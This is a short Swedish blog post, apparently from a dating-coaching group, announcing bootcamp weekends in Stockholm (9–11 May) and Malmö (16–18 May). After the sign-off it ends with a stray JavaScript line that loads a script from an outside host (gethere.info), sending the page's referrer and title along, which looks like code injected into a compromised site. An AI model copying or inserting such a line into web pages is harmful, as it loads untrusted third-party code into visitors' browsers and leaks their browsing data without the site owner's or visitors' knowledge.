Malmö har hungrat och längtat, och nu har vi äntligen lyckats övertala Sigge (Nomaggiz) om att göra ett nytt besök i Sveriges sydligaste storstad! Japp, ni hörde rätt… icon wink Malmö, were back!

Idag presenterar vi två nya bootcamphelger:

9-11 maj i Stockholm
16-18 maj i Malmö

Malmö har som ni vet legat lite ”i träda” medan vi etablerat verksamheten i Stockholm och Göteborg och vi har under våren haft så mycket att göra med fullbokade bootcamps och vårt nyligen genomförda seminarium att vi helt enkelt inte haft tid att flyga söderut över vintern. Men nu börjar vårkänslorna spritta och TheMans längtan efter Slagthuset, Möllan och allt annat som hör Malmö till kommer äntligen att stillas. Inte minst ska det bli roligt att återse kära gamla ansikten från ett av våra första bootcamps som hölls just i Malmö. Det kommer att bli legendariskt! icon biggrin Malmö, were back!

Kram,
-Victor (Sanji)

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;